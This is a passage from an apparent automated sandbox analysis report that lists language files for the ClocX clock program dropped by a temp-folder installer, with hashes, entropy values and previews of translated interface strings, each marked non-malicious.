.%d..050,......051,.......052,.......053,......054,..-......055,.... ........056,:....0

C:\Program Files (x86)\ClocX\Lang\Hungarian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2439
Entropy (8bit):	5.524282620245631
Encrypted:	false
SSDEEP:	48:fzycwT+JHTioGFfNUGN+WBgJL8u/o9XwcrPFTN79ZDx5UyfdQy4wPzevGTjTu:OPiJzjGFfNRYJl/o9DBVTUyfm/aTu
MD5:	897DF08D2097EBAE47D45632EEF4344B
SHA1:	CE7718EDCA84272A94A19EF831604E88EE76CAF9
SHA-256:	FB73CFCC647F00CD7FB3AAD3F6FA6753AE62879BAF4D4576CD8116E1AA55BCEC
SHA-512:	DA22C98D987F45FC49E12053EC4B227E75508FCC1CA46ACE9855D95F877FD633522C62CEE305E0188BAD5538E923310FAF14FDAB94F357D90598178D586E990B
Malicious:	false
Preview:	001,K.pet nem lehet bet.lteni..002,Id.z.t.t nem lehet elind.tani!..003,.ltal.nos..004,Megjelen.t.s..005,En&ged.lyezve..006,Alpha csatorna hiba!..007,Hiba az .ramutat. bet.lt.sekor!..008,Hiba az percmutat. bet.lt.sekor!..009,Hiba az m.sodpercmutat. bet.lt.sekor!..010,DE..011,DU..012,ClocX - id.z.t. KIKAPCSOL!..013,Nem lehet a h.tteret bet.lteni!..014, .&tl.tsz.s.g (Win2k/XP) ..015, &Els.bbs.g ..016,Alacsony..017,Norm.l..018,Magas..019, .l&sim.t.s ..020,&Kikapcsolva (gyors)..021,&1 met.dus (alap.rtelmezett)..022,&2 met.dus..023, &Ablak opci.k ..024,&Mindig fel.l..025,As&ztalhoz t.zve (Win2k/XP)..026,.tklikkel.s (Win2k/&XP)..027,A&blak r.gz.t.se..028,&Poz.ci. limit.l.sa az ablakhoz..029, &El.be.ll.t.sok ..030,&DE/DU kijelz.se..031,Percenk.nt..032, &H.tt.r ..033, &Ind.t.s ..034,&Windows-al..035,Be&jelentkez.skor (felhaszn.l.)..036,Poz. ne korrig.lja (d&u.l-monitor)..037,Be.ll.t.sok..038,&OK..039,&M.gsem..040,&Bez.r..041,.&j.....042,&Szerkeszt.s.....043,&T.r.l..044,Tes&zt..045,Riaszt.sok id

C:\Program Files (x86)\ClocX\Lang\Indonesian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2296
Entropy (8bit):	5.2130956360951375
Encrypted:	false
SSDEEP:	48:S7Ikp8cURun1XREJ7aTBHkRAfdkkDdOhcjSDEnb4rt6VwTu:SMke7RsXREJ7ckk5SGb4wVwTu
MD5:	93ACABEC2DAFEC5E819D4ADFBDD86429
SHA1:	7459019E4DB35D21E2494432860FF94BA11AB498
SHA-256:	3A615F5AFDF3592336BB992B8176A702B7CE81AABA0CC13F7192E57023A973AA
SHA-512:	FBB12F645627CB6C57F513AB1189F5FF0C954B1664D8B74B6FDD451F96C8B1A58C9B166A5483670104B2947C16E5C2BE9A49F224EB237C318E4925FC5D386986
Malicious:	false
Preview:	001,Tidak dapat memuat gambar,..002,Tidak dapat memulai waktu!..003,Umum..004,Penampilan..005,&Enabel..006,Eror memasukkan saluran alfa!..007,Tidak dapat memuat jarum jam!..008,Tidak dapat memuat jarum menit!..009,Tidak dapat memuat jarum detik!..010,AM..011,PM..012,ClocX - alarm SHUTDOWN!..013,Tidak dpt memuat latarbelakang!..014, &Transparansi (Win2k/xP)..015, P&rioritas..016,Rendah..017,Normal..018,Tinggi..019, Antialiasing ..020,Disa&bel (cepat) ..021,Metode &1 (default)..022,Metode &2..023, jendela opsi..024,Sel&alu di atas..025,Gantung di Deskto&p (Win2k/XP)..026,Bebas &klik (Win2k/XP)..027,&Jendela tetap..028,Batas posisi dg &layar..029, Opsi preset..030,Tampilkan &AM/PM..031,Dengan teliti..032, &Latarbelakang..033, Mulai ..034,Mulai bersama &Windows..035,&Mulai dengan login (pengguna)..036,Jangan a&tur pos. (dual-monitor)..037,Opsi..038,&Oke..039,Ba&tal..040,T&utup..041,Ba&ru.....042,&Edit... ..043,Ha&pus..044,&Tes..045,Urut alarm berdasarkan waktu..046,Nama..047,Waktu..048,Tan

C:\Program Files (x86)\ClocX\Lang\Italiano.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2384
Entropy (8bit):	5.1377744629293165
Encrypted:	false
SSDEEP:	48:eYCHSWlXfWhQYLnGWDvuYhAbBLG/VDR1OUZFM9S+Net8W92xxZxpvdAj/M:F0SEXf4QMpDvu8AbSVV4eFM9S+ct8Wgd
MD5:	2D6C2E8AE88C3269B639DDACFCC87775
SHA1:	43EE3F9A70A9127BBF36B7C82D19716FE0B7A316
SHA-256:	F054EEC75474FA5AF87268D06C5DC7B007ED18C5A7FCB682C8F1E681BC5CA63A
SHA-512:	75D5595B77A65F6B03E715358A80CB80E3C3BF81A02169BFEE63515251A2DEB03427B34183FD6ED27F27F705406AD2BE1CCBC4596D4178D37202174B992F550D
Malicious:	false
Preview:	001,Impossibile caricare l'immagine.002,Impossibile inizializzare il timer!.003,Generale.004,Aspetto.005,Abilitato.006,Errore con la trasparenza!.007,Impossibile caricare la lancetta delle ore!.008,Impossibile caricare la lancetta dei minuti!.009,Impossibile caricare la lancetta dei secondi!.010,AM.011,PM.012,ClocX - SPEGNIMENTO (allarmi)!.013,Impossibile caricare lo sfondo!.014, Trasparenza (Win2k/XP) .015, Priorit. .016,Bassa.017,Normale.018,Alta.019, Bordi sfumati .020,Disabilitato (veloce).021,Metodo 1 (default).022,Metodo 2 (lento).023, Opzioni Finestra .024,Sempre in primo piano.025,Attacca al Desktop (Win2k/XP).026,Clicca attraverso (Win2k/XP).027,Finestra fissa.028,Posizione limitata dallo schermo.029, Opzioni Orologio .030,Mostra AM/PM.031,Ogni minuto.032, Immagine .033, Avvio .034,Inizio automatico.035,Inizio al login utente.036,Non riposizionare la finestra.037,Opzioni.038,&OK.039,&Annulla.040,&Chiudi.041,&Nuovo....042,&Modifica....043,&Elimina.044,&Test.045,Allarmi ordinati

C:\Program Files (x86)\ClocX\Lang\Japanese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	Non-ISO extended-ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2474
Entropy (8bit):	6.2844739666300145
Encrypted:	false
SSDEEP:	48:R1ZqJLkNJuzKizSeJjhrMVRazEBplicgrqrjYAayZyGX8LD/uPCnXTu:DZqKNJfixJjhrMjazEBqnqrjYAa8Ls25
MD5:	2E5F6A85256DA31D089291A7E2A9A762
SHA1:	70AE0BC41F4111DBE941F42CC3148B5B7839EE1C
SHA-256:	94DA919FCC7FDF0B84B6E056D7C5151E3BF481F83501E0956C4482E9C7DAB324
SHA-512:	C72C832A888236F068E46F69E5D00F6E62E07BC5C0E091293ED8CD27EAA3B22800EAEDEA2E4E9A5ED3383218B8A7CB0584DA6079D8F62A80E2CECE656E380CD8
Malicious:	false
Preview:	;ClocX 1.5 alpha 1 Language File for Japanese..;Auter : Fujita..;Url : http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/..;e-Mail : gallery_fake@msn.com....001,.........o.........002,.^.C.}.[.......................!..003,.....004,.O....005,.g.p......006,.A...t.@.`.....l.......G...[!..007,...j.....s.o.......!..008,...j.....s.o.......!..009,.b.j.....s.o.......!..010,AM..011,PM..012,ClocX - .A...[.. ....!..013,.w.i.....s.o.......!..014, .... (Win2k/XP) ..015, .D...... ..016,....017,.....018,....019, .A...`.G.C...A.X ..020,.s.\ (....)..021,...@ 1 (...)..022,...@ 2 (.x..)..023, .E.C...h.E.I.v.V.... ..024,....O..\....025,......\.. (Win2k/XP)..026,.N...b.N.......... (Win2k/XP)..027,..u.........028,.........\........029, .v...Z.b.g.... ..030,AM/PM..\........031,Minutely..032, .w.i ..033, .X.^.[.g.A.b.v..034,Windows.N......N........035,...[.U...O.I......N........036,.E.B...h.E...u.........037,.....038,OK(&O)..039,.L.....Z..(&

C:\Program Files (x86)\ClocX\Lang\Korean.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2261
Entropy (8bit):	6.240619749370674
Encrypted:	false
SSDEEP:	48:cHQXRvolvFxZrTUJN2qu/4ppruwEjOz6fF+z6hEHQXwWMooOz/RlZxY7AkCTu:EQBQhFxZrwv2NwX5kO8+jQgWMooEHZlC
MD5:	2EEFDCDA287C97061ACBDF4409AA659B
SHA1:	C1B8A1161D3EAF0836B991694931721DA3F6E8DE
SHA-256:	13D52A3C7D896B2AF05774F7C6B0E43AD4D93953F0F721C490D610FB26CA22B7
SHA-512:	1A67388402DD1228536BD53F0889FAAECE9ED4A9713E2AC1DFB84AE96F721E2EC1B9B1B3D1E2117687D5FF78175E73B88ED7CA8BBA01C537D5BD0567ED1DF27D
Malicious:	false
Preview:	001,..... ..... .. ..........002,..... ...... .. .......!..003,.....004,.....005,.....(&E)..006,....... ... ....!..007,..... ..... .. .......!..008,..... ..... .. .......!..009,..... ..... .. .......!..010,AM..011,PM..012,ClocX - ... ......!..013,..... ..... .. .......!..014,.....(&T) (Win2k/XP) ..015,......(&R)..016,......017,......018,......019,.........(..... .....)..020,...........(&B) (.......)..021,......... ...&1 (..)..022,......... ...&2..023,...... .....024,... ....(&A)..025,........ ....(&P) (Win2k/XP)..026,....... ....(&K) (Win2k/XP)..027,........ ....(&U)..028,... ........ ......(&L)..029,... ...... .....030,&AM/PM .......031,.....032,...(&B)..033,......034,....... ... .......(&W)..035,...... ... .......(&S)..036,... ........ ...(&J) (.......)..037,.....038,...(&O)..039,...(&C)..040,...(&C)..041,.......(&N)..042,....(&E)..043,....(&D)..044,....(&T)..045,....... ... .........046,.....047,.....0

C:\Program Files (x86)\ClocX\Lang\Nederlands.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2489
Entropy (8bit):	5.2427085130863915
Encrypted:	false
SSDEEP:	48:fm2ZJkrpaZ4DbqfTHD2E5tFUHzRKZmu1dE69x279IIjHim90gcqID+mTu:fm2ZJkESHq7FqRKZPZ9x279PjpOY5mTu
MD5:	C817194B9BCBD2D5323B0A6D7EF7C56A
SHA1:	810C07D0D0385C428D5D1B4BE7FC00DFF3DCE76D
SHA-256:	8DE577D96C63E9B9E2D7211BC900718F872C6EBE3979A83F46876FE768B1AA09
SHA-512:	587142CE6D2F7D2289560A94E75B20E831B6CDA1D4EEBFE1A20428FE028B8FCF2C7D72E82F16655B495BDA35C64A5E1E1E3A21DED8B300A4ED7AC23174961C75
Malicious:	false
Preview:	001,Kan afbeelding niet laden..002,Kan klok niet initialiseren!..003,Algemeen..004,Beeld..005,Inschakelen..006,Fout bij toevoegen alphakanaal!..007,Kan urenwijzer niet laden!..008,Kan minutenwijzer niet laden!..009,Kan secondenwijzer niet laden!..010,VM..011,NM..012,ClocX - Alarm UITSCHAKELEN!..013,Kan achtergrond niet laden!..014, Transparantie (Win2k/XP) ..015, Prioriteit ..016,Laag..017,Normaal..018,Hoog..019, 'Anti-aliasing' ..020,Uitgeschakeld (snel)..021,Methode 1 (normaal)..022,Methode 2 (traag)..023, Venster-eigenschappen ..024,Altijd op voorgrond..025,Plak aan bureaublad (Win2k/XP)..026,Klik door klok heen (Win2k/XP)..027,Onverplaatsbaar venster..028,Stem positie af op scherm..029, Voorgeprogrammeerde opties ..030,VM/NM weergeven..031,Elke minuut..032, Achtergrond ..033, Opstarten ..034,Opstarten met Windows..035,Opstarten bij aanmelden..036,Pos. niet wijzigen (2-schermen)..037,Opties..038,OK..039,Annuleren..040,Sluiten..041,Nieuw.....042,Bewerken.....043,Verwijderen..044,Test

C:\Program Files (x86)\ClocX\Lang\Polish.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2349
Entropy (8bit):	5.512392538157304
Encrypted:	false
SSDEEP:	48:LtjgkeiQhyCSJsZmDnami9fdB2CLLIIDj/I1zICfonRF1XOzYF9x2bL1aCFr/f:hMgCSJamrami9f3jHd2ImonhXp9x21a+
MD5:	6DAC613D6C6D0A30BEAC1B1536E051AF
SHA1:	FAF8F9EA6E95A1177B62E10CB8D9E3BC54F5F8F4
SHA-256:	C241583B8B3854991D37C399D82F71994F20EA961054FA94006815D72B713507
SHA-512:	915A39083A790864A52C8D270F307C11F43B4D4F6A712275A487318111CDDD453632EA481E6A552D147EFF786A5E679D13A9D10F26D3DD9F788C3CFD95B8F852
Malicious:	false
Preview:	001,Nie mog. wczyta. obrazu..002,Nie mog. uruchomi. stopera!..003,Og.lne..004,Wygl.d..005,W..czone..006,B..d przy dodawaniu kana.u alpha!..007,Nie mog. wczyta. wskaz.wki godzinowej!..008,Nie mog. wczyta. wskaz.wki minutowej!..009,Nie mog. wczyta. wskaz.wki sekundowej!..010,AM..011,PM..012,ClocX alarm: WY.ACZENIE KOMPUTERA!..013,Nie mog. wczyta. t.a!..014, Prze.roczysto.. (Win2k/XP) ..015, Priorytet ..016,Niski..017,Normalny..018,Wysoki..019, Antyaliasing ..020,Wy..czony (szybko)..021,Metoda 1 (domy.lnie)..022,Metoda 2 (wolno)..023, Opcje okna ..024,Zawsze na wierzchu..025,Przypnij do pulpitu (Win2k/XP)..026,Klikaj przez zegar (Win2k/XP)..027,Zablokuj pozycj...028,Ogranicz pozycj. do ekranu..029, Opcje zegara ..030,Pokazuj AM/PM..031,Minuty..032, T.o ..033, Uruchamianie ..034,Uruchom z Windows..035,Uruchom przy logowaniu..036,Nie dopasowuj pozycji (2 monitory)..037,Opcje..038,&OK..039,&Anuluj..040,&Zamknij..041,&Nowy.....042,&Edytuj.....043,&Usu...044,&Test..045,Alarmy posortowane wg cz

C:\Program Files (x86)\ClocX\Lang\Portuguese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2229
Entropy (8bit):	5.26744165871897
Encrypted:	false
SSDEEP:	48:9DL1hlqQSf339bGvpmxNOp7DIPHCErjK4QvX2UXaUJkwwIG:9DZnqQS3NbCmz5rFQuUhJTwIG
MD5:	DCD35241BCB58CB9A495AEBBEE280E77
SHA1:	A70E368A9E2E5FD002DCA142AC7C357BB87B4AA4
SHA-256:	424BF20CECBB097F714FA9BD12B4EA6EC4902F6229FEC88C80FF0A28F6E91BCD
SHA-512:	040F222DDC205817E629FE3EA5094320607F3E5E72A5CDF28FBB70E4C9B855AA6807697FA160B4DDA18D5338972DA65CA70F122C6073861DD6ED19C8BBCC4A67
Malicious:	false
Preview:	001,Imagem n.o carregada.002,Temporizador n.o iniciado!.003,Geral.004,Apar.ncia.005,Habilitado.006,Erro no canal alfa!.007,Ponteiro das horas n.o carregado!.008,Ponteiro dos minutos n.o carregado!.009,Ponteiro dos segundos n.o carregado!.010,AM.011,PM.012,ClocX - Desligar alarme!.013,Fundo n.o carregado!.014,Transpar.ncia (Win2k/XP).015,Prioridade.016,Baixa.017,Normal.018,Alta.019,Contorno suave.020,Desativado (r.pido).021,M.todo 1 (padr.o).022,M.todo 2 (lento).023,Op..es de janelas.024,Sempre em primeiro plano.025,Colar ao Desktop (Win2k/XP).026,Clique atrav.s (Win2k/XP).027,Fixo.028,Posi..o limitada pela tela.029,Op..es do rel.gio.030,Mostrar AM/PM.031,Minuciosamente.032,Fundo.033,Arranque.034,Iniciar com o Windows.035,Iniciar com login (usu.rio).036,N.o ajustar pos. (monitor-duplo).037,Op..es.038,&OK.039,&Cancelar.040,&Fechar.041,&Novo....042,&Editar....043,&Apagar.044,&Testar.045,Alarmes ordenados por tempo.046,Nome.047,Hora.048,Data.049,%d. dia no m.s.050,Diariamente.051,Semanalme

C:\Program Files (x86)\ClocX\Lang\Romanian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2326
Entropy (8bit):	5.18100710273134
Encrypted:	false
SSDEEP:	48:9CsmPKCGCvGCtQCVlJupQnCY+hALpZ4AjrNGycLek18fwwV3MuZsCHYQ2r:9OPKjuGEQ2JqQnCYOErNGtLekKIwV3TW
MD5:	928A5C47953AF408531CD2DC2AC8584E
SHA1:	E27A61AF8B8FE4B22B13CE948CBBD80E55A6AF76
SHA-256:	4764809159E4FD2D9F0ED0E7F6D44A388C97BDCD6C2631D152DC871E29245EBF
SHA-512:	921F8917AFF5CDF7819B19512AA81C779026B32A2E0A30C82AF925FE76D22B0206AB2F132999F40979C1F2DB23AD607B2B088B7D7365044BE41B42C7908B09EA
Malicious:	false
Preview:	001,Nu se poate .ncarca imaginea!..002,Nu se poate initializa timerul!..003,General..004,Aspect..005,Activ..006,Eroare de transparenta!..007,Nu se poate .ncarca indicatorul orar!..008,Nu se poate .ncarca minutarul!..009,Nu se poate .ncarca secundarul!..010,AM..011,PM..012,ClocX - ORA .NCHIDERII!! (programata)..013,Nu se poate .ncarca fondul!..014, Transparenta (Win2k/XP) ..015, Prioritate ..016,Joasa..017,Normala ..018,Ridicata..019,Margini catifelate..020,Inactiv (rapid)..021,Metoda 1 (implicit)..022,Metoda 2 (lent)..023,Optiuni Fereastra ..024,Permanent .n prim plan..025,Fixat pe Desktop (Win2k/XP)..026,Clic transparent (Win2k/XP)..027,Fereastra fixa..028,Pozitie limitata la ecran..029,Optiuni ceas ..030,Indicator AM/PM..031,La minut..032,Imagine ..033,Pornire ..034,Lansare automata..035,Lansare la login..036,Pozitia ferestrei fixa ..037,Optiuni..038,&OK..039,&Abandon..040,&Inchidere..041,&Nou.....042,&Modifica.....043,&Elimina..044,&Test..045,Alertari ordonate cronologic..046,Nume..

C:\Program Files (x86)\ClocX\Lang\Russian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2413
Entropy (8bit):	5.693543780784365
Encrypted:	false
SSDEEP:	48:t8IUxeikqFAecTGM+Nygw49MLuDbV3NaG2PHZG+DcZ577UagrTu:twxTkqFAPB+LwMMLUb2GaHhcZhUzTu
MD5:	BA5647E2889A3B3DA10E3BD5BE0CE4B5
SHA1:	CBE0EF3874710A2EFC9725D1A2C2F900B828D6C0
SHA-256:	2065D94FF0EF5FE40F3521861E61AB70EC546A17CB3CC2E9B15D64BD3EB96BA1
SHA-512:	DEAC73849488BB3CC82BA1AA7B930494DD1868F7011C7B6D7541D0744BF26BF94CF2D35D5BC069A54143FFE93857EBF239FC74CF12145D6F54EDC6E1F75E6164
Malicious:	false
Preview:	// iNorbert proudly presents..// russian translate of ClocX..// iNorbert@mail.ru....001,...... ........ ...........!..002,...... ....... .......!..003,.......004,....... .....005,..........006,...... .......... .....-......!..007,...... ........ ....... .......!..008,...... ........ ........ .......!..009,...... ........ ......... .......!..010,AM..011,PM..012,ClocX - ............!..013,...... ........ ......!..014,............ (Win2k/XP) ..015,......... ..016,........017,.........018,.........019,........... ..020,......... (......)..021,...... #1 (.. .........)..022,...... #2..023,....... ......024,...... ......025,.. ....... ..... (Win2k/XP)..026,.... .......... (Win2k/XP)..027,...............028,.......... ...... ..........029,......... ............030,.......... "AM/PM"..031,...........032,...... ..033,........ ..034,........ . ..............035,.......... ... ..... .......036,.. .............. . ..........037,...........038,....039,........040,.........041,..........042,........0

C:\Program Files (x86)\ClocX\Lang\Simple_Chinese.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1886
Entropy (8bit):	6.402116213311843
Encrypted:	false
SSDEEP:	48:VlpO2ZDqLqz0Sog9VNQmdZFnU0T2fn2lYQE8cCM4vjvqB4uPCnXTu:zpO2ZDqLOP79zxnvT0nhQpJ9jva6XTu
MD5:	FA2BA4997B287CE38F2DBDDCD180D4F5
SHA1:	521B78583AE110DDA52CCACD57848B89B9589FC9
SHA-256:	6DEF2B26AD82D20590CDB14AD36A5851F6E2AF6FCA72EFC87C26FE576DDD962A
SHA-512:	C62A1192F551B6DC632315275D6E6EF5E2806DA4DFCE9AFDFBF4E06F80A6702F57CFB0222477C599814F2D577B979ED686336047848BA1816F1A6100B6667E8F
Malicious:	false
Preview:	001,.............002,.................003,......004,.....005,......006,... Alpha .........007,.............008,.............009,..............010,AM..011,PM..012,ClocX - ..........013,..............014,......Win2k/XP....015,..... ..016,....017,......018,....019,.......020,............021,............022,...............023,..........024,............025,.......Win2k/XP....026,..........Win2k/XP....027,.........028,....................029,...... ..030,... AM/PM..031,.......032,........033,.........034,.. Windows ......035,.............036,...............037,.....038,...(&O)..039,...(&C)..040,...(&C)..041,...(&N).....042,..(&E).....043,...(&D)..044,....(&T)..045,.....................046,......047,.....048,......049,....... %d.....050,.....051,.....052,.....053,.....054,.....055,.............056,.......057,...........058,.....059,........060,............061,........062,.... WAV ........063,........

C:\Program Files (x86)\ClocX\Lang\Slovak.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2406
Entropy (8bit):	5.585890762321675
Encrypted:	false
SSDEEP:	48:Y81cEWQ51kbiZyt8jJkuVB+X4lGxvSDjvna4HP/MTNOTJPcRW9ZBM:YYWQbDQW9eIlWEnJP6OGUa
MD5:	6B5809A31DE634A0EC58019350E4D50F
SHA1:	6060C89F71FFEF00DF7053D66087938DE5E2AEF5
SHA-256:	757B6322FF5894AF64AB3887BD8690838D5D59C561CB963CAE1AD8FF78117F1E
SHA-512:	45E98F361EEEA4ED4FEAEA0A699779F6E8A7FD1D9DC7360288C712159651419CEBD51B6A66BBA1327B316D37B294410D20DF6C33C71715CBE5F49717CA70F648
Malicious:	false
Preview:	001,Nemo.no na..ta. s.bor!..002,Nemo.no inicializova. Timer!..003,General..004,Appearance..005,Enabled..006,Chyba v pripojen. k alfa kan.lu!..007,Nemo.no na..ta. hodinov. PNG ru.i.ku!..008,Nemo.no na..ta. min.tov. PNG ru.i.ku!..009,Nemo.no na..ta. sekundov. PNG ru.i.ku!..010,AM..011,PM..012,ClocX - bud.k vyp.na po..ta.!..013,Nemo.no na..ta. pozadie!..014,Prieh.adnos. (Win2k/XP) ..015,Priorita..016,N.zka..017,Stredn...018,Vysok...019,Vyhladzovanie hr.n ..020,Vypnut. (r.chlej.ie)..021,Met.da 1 (v.chodzie)..022,Met.da 2 (pomal.ie)..023,Nastavenie okna ..024,V.dy na vrchu..025,V.dy na spodku (Win2k/XP)..026,Preklik.vacie (Win2k/XP)..027,Nepresunute.n...028,Zak.za. posunutie mimo obraz..029,Mo.nosti pozadia..030,Zobrazi. AM/PM..031,Minutely..032,Pozadie..033,Sp...anie..034,Spusti. pri .tarte Windows..035,Spusti. po prihl.sen. u..vate.a..036,Neupravova. poz.ciu (dual-monitor)..037,Mo.nosti..038,&OK..039,&Zru.i...040,&Zavrie...041,&Nov......042,&Zmeni......043,&Zmaza...044,&Test..045,Bud.ky (

C:\Program Files (x86)\ClocX\Lang\Slovenian.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2265
Entropy (8bit):	5.32217234304011
Encrypted:	false
SSDEEP:	48:ZWUFVFU14/Jj/aMzpW1yOrKUaA2DY5uSs8CIFNM8oy5G5GPunusGN66phovaTu:zc4J7aMY1yOrKUP2OC8vFmhykAPuuBi3
MD5:	0C0351290AD760F3CEA848F6F65B4AF3
SHA1:	C2E4A8B2426463F4E80CF9D5FE74317C55A76D3E
SHA-256:	4D7AF300B3FBBC5D8CE3DCAC871C9C6CA4EDD6785721418C90042CC5C23DEC01
SHA-512:	4428499AEB70E37F6B2F6868A2B08DA1C2A121F4E2DA741048E6125C65BF224D3FBBE6CCD8421387666B7F87D3F336452902D1E3FF164500A9213340E1665DDA
Malicious:	false
Preview:	001,Ne morem prebrati slike..002,Ne morem pognati .asovnika!..003,Splo.ne nasavitve..004,Izgled..005,Omogo.eno..006,Napaka pri nastavljanju alfa kanala!..007,Ne morem prebrati kazalca za ure!..008,Ne morem prebrati kazalca za minute!..009,Ne morem prebrati kazalca za sekunde!..010,AM..011,PM..012,ClocX - alarm IZKLJU.EVANJE!..013,Ne morem prebrati ozadja!..014, Prosojnost (Win2k/XP) ..015, Prioriteta ..016,Nizek..017,Normalen..018,Visok..019, Bla.enje..020,Izklju.eno (fast)..021,Metoda 1 (default)..022,Metoda 2 (po.asneje)..023, Opcije okna ..024,Vedno na vrhu..025,Prijet na Desktop (Win2k/XP)..026,Klik skozi (Win2k/XP)..027,Nepremi.no okno..028,Omejiti pozicijo na velikost zaslona..029, Preset opcije ..030,Prika.i AM/PM..031,Minutno..032, Ozadje ..033, Startup ..034,Za.eni z Windowsi..035,Za.eni ob prijavi..036,Ne vra.aj okna na za.etno pozicijo..037,Opcije..038,&V redu..039,&Prekli.i..040,&Zapri..041,&Novi.....042,&Popravi.....043,&Bri.i..044,&Test..045,Alarmi urejeni po .asi..046,Na

C:\Program Files (x86)\ClocX\Lang\Srpski.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2344
Entropy (8bit):	5.344770829282602
Encrypted:	false
SSDEEP:	48:Oe2ySYKHbJVvamhXm6NPLFXYmB4midNoiqiEUygVMg+a3kGjkIa2RFmk4RTu:Oe2ySFbJham86NPLFX3OmwSPU50a37Br
MD5:	1D9538A2F34F9F14C5359A802D88EEA3
SHA1:	97D508EE407E866EE43D93789EDF66A82E067AF6
SHA-256:	80E87432D776463469912BC1A0B42039FE76FC86014F236D277678ABC3F3246C
SHA-512:	230CD741CDCF2A762C6DFFB9A18772E984DF965265879BFD8400DAB2C4CE74CA70DBA5A8E2BD0B155D2D110E49B6001110E04EECFD3799A7ECEA4A402D6D217F
Malicious:	false
Preview:	001,Ne mogu da u.itam sliku..002,Ne mogu da inicijalizujem tajmer!..003,Op.ta pode.avanja..004,Izgled..005,Omogu.eno..006,Gre.ka pri dodavanju alfa kanala!..007,Ne mogu da u.itam kazaljku za sate!..008,Ne mogu da u.itam kazaljku za minute!..009,Ne mogu da u.itam kazaljku za sekunde!..010,AM..011,PM..012,ClocX - alarm ISKLJU.IVANJE!..013,Ne mogu da u.itam pozadinu!..014, Providnost (Win2k/XP) ..015, Prioritet ..016,Nizak..017,Normalan..018,Visok..019, Umek.avanje..020,Isklju.eno (fast)..021,Metoda 1 (default)..022,Metoda 2 (sporije)..023, Opcije prozora ..024,Uvek na vrhu..025,Zaka.en za Desktop (Win2k/XP)..026,Klik kroz (Win2k/XP)..027,Nepokretan prozor..028,Ograni.i poziciju veli.inom ekrana..029, Preset opcije ..030,Prika.i AM/PM..031,Minutno..032, Pozadina ..033, Startup ..034,Pokreni sa Windows-om..035,Pokreni pri login-u (user)..036,Ne vra.aj prozor na po.etnu poziciju..037,Opcije..038,&U redu..039,&Otka.i..040,&Zatvori..041,&Novi.....042,&Izmeni.....043,&Obri.i..044,&Test..045,Al

C:\Program Files (x86)\ClocX\Lang\Suomi.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2436
Entropy (8bit):	5.214434411536153
Encrypted:	false
SSDEEP:	48:jAspe44gcoLB3zjkP0FdaJnSp/K2drjNamUPTu:jAsp2gcMjk8F8ABjNLWTu
MD5:	FAA5BF602E511AD03ED8FAEEEC9D40CF
SHA1:	1748B8D296B6A6D742AD378BEFAC1622D8845A37
SHA-256:	5C131D1314BDF05B942583F5D6D1EA2D5659628FEADB42F4D3005BDB9982E470
SHA-512:	DE92EC4855C702E05BDFBF89F25C7B6177497B81142575692557ED2850339D2EC4B37C3A956A2EA8A4FCC180D5E53BD1D5604FE40980C4E02F12660919DD0B58
Malicious:	false
Preview:	001,Kuvaa ei voi ladata!..002,Ajastinta ei voi k.ynnist..!..003,Yleiset..004,Ulkoasu..005,&K.yt.ss...006,Virhe lis.tt.ess. alfakanavaa!..007,Tuntiosoitinta ei voi ladata!..008,Minuuttiosoitinta ei voi ladata!..009,Sekuntiosoitinta ei voi ladata!..010,AM..011,PM..012,ClocX - h.lytys PC SAMMUTETAAN!..013,Taustaa ei voi ladata!..014,&L.pin.kyvyys (Win2k/XP) ..015,&Prioriteetti ..016,Alhainen..017,Normaali..018,Korkea..019,Aliasesto..020,&Ei k.yt.ss. (nopea)..021,&Tapa 1 (oletus)..022,&Tapa 2..023,Ikkuna-asetukset ..024,&Aina p..llimm.isen...025,&Kiinnit. ty.p.yd.lle (Win2k/XP)..026,&L.pinapsautus (Win2k/XP)..027,&Lukitse sijainti..028,&.l. siirr. n.yt.n reunojen yli..029,Kellon asetukset ..030,N.yt. AM/PM..031,Minuuteittain..032,&Tausta..033,K.ynnistys ..034,&K.ynnist. Windowsin kanssa..035,&K.ynnist. sis..nkirjauduttaessa ..036,&.l. muuta sijaintia (kaksoisn.ytt.)..037,Asetukset..038,&OK..039,&Peruuta..040,&Sulje..041,&Uusi.....042,&Muokkaa.....043,&Poista..044,&Testaa..045,H.lytykset ai

C:\Program Files (x86)\ClocX\Lang\Svenska.lng

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2310
Entropy (8bit):	5.374266043513612
Encrypted:	false
SSDEEP:	48:WavowZsfFXA9JUCFRQijv1BMTZKNQgXVynztV9QmqAUaxMxviysDHO5Ltg60Kg:WavowEFw9JUMRQixByZaJV0zVxqAxzyM
MD5:	692A55F3A8B0D2240679A9A8F6CD8B83
